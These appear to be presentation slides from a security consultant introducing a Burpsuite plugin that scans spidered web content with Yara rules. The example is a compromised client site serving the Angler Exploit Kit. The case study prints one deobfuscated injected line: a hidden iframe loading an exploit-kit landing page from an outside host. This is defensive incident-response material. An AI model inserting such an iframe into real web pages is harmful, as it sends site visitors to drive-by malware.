Burpsuite / Yara Integration

Ian DuffyPolito, Inc.@politoinc

Introduction

• Who am I?• About Burpsuite and Yara• Case study: A compromised website• Plugin development• Future Roadmap• Questions

Who am I?

• Former USAF network defender• Current cybersecurity consultant for Polito• Background in penetration testing (traditional

and web application) as well as Malware analysis

• Current duties involve malware analysis and threat hunting

Burpsuite

• Burpsuite is a MITM proxy tool for viewing, intercepting, modifying, and transmitting HTTP(S) requests and responses.

• Allows the user to view all web content down to the byte level, to include static pages, JavaScript, JSON, WebSockets, and much more.

• Includes several tools for assessing the security of web applications

BurpSuite

Yara

• Yara is a sophisticated pattern matching tool• Specifies a language for describing strings,

binary / hexadecimal data, file offset information, file structure information in order to write pattern matching rules

• Rules can be run against one or many files or data streams in order to find matches

Yara Rules Example

Case Study

• Client contacts Polito and says that their IT department is getting phone calls stating that their website is causing “FireEye Alerts” and is likely compromised

• Polito is asked to investigate and determine:– Whether the site is actually compromised– If so, scope, scale, and impact of the compromise

Case Study

• We request a tarball of the current webroot folder and a dump of any backend CMS databases

• In the meantime we begin spidering the website using Burpsuite…

Case Study

Highly obfuscated JavaScript – interesting…

Case Study

• The obfuscated JavaScript is consistent with the Angler Exploit Kit, which matches the alerts reported by our client’s IT department

• After deobfuscation of the JavaScript we see the following:

document.write('<style>.ddidfodevxgsz{position:absolute;top:-907px;width:300px;height:300px;}</style><div class="ddidfodevxgsz"><iframe src="http://ryonfmza.buildera.cf/consent/knife-lodge-19720974" width="250" height="250"></iframe></div>');

Case Study

Case Study

• Problems:– How do we identify whether this EK landing page /

malicious JavaScript has been inserted into any other pages on the site?

– How do we identify whether the attackers have left themselves a back door?

Case Study

• Possible Solutions– Wait for three days before client can get tarball of

their website uploaded to our SFTP server– Manually search through online web content– Write something to automate our searching

Writing Burpsuite Plugins

• Burpsuite supports plugins in Java, Ruby, and Python– Ruby requires JRuby– Python requires Jython

• We decided to use Python to develop our Yara integration for expedience

The Plugin…

• Burpsuite specifies several interfaces for performing various tasks

• Depending on what functionality we are trying to implement, we must implement one or more of those interfaces

• The interfaces specify methods that must be implemented in order to handle events from the Burpsuite UI

The Plugin…

• Each of the interfaces requires specific methods be implemented– IBurpExtender requires a method named

registerExtenderCallbacks– Itab requires methods named getTabCaption and

getUIComponent• Documentation for the interfaces is available

at:– https://portswigger.net/burp/extender/api/index.html

The Plugin…

• Our basic use case was as follows:– Burpsuite user spiders a website to retrieve as

much of the content as possible– User right-clicks on website in Burp UI and selects

“Scan with Yara”– Yara is used to scan the content of the web

requests and responses– Results displayed to user in a Tab

Jython

• Jython is a hybrid between Java and Python• You can “import” Java classes, instantiate Java

objects, and call their methods via Python code:

Jython

• Java objects are instantiated by calling a contructor method with the same name as the class– No “new” keyword like in Java– Parameters to the constructors are the same

• Once instantiated, class objects can be used just as with Java

Demonstration

Live demo time – this always works!

Future Roadmap

• Things that we are looking into:– Live Yara scanning as you surf– Persistent configuration settings– Multiple rules files

• Your thoughts and feature requests are most welcome!

Grab a Copy

• Plugin is available on our Github site:• https://github.com/PolitoInc/Yara-Scanner

• Please send any feedback to ian@politoinc.com

Questions?

Ian DuffyPolito, Inc.@politoinc

www.politoinc.com

Thank You!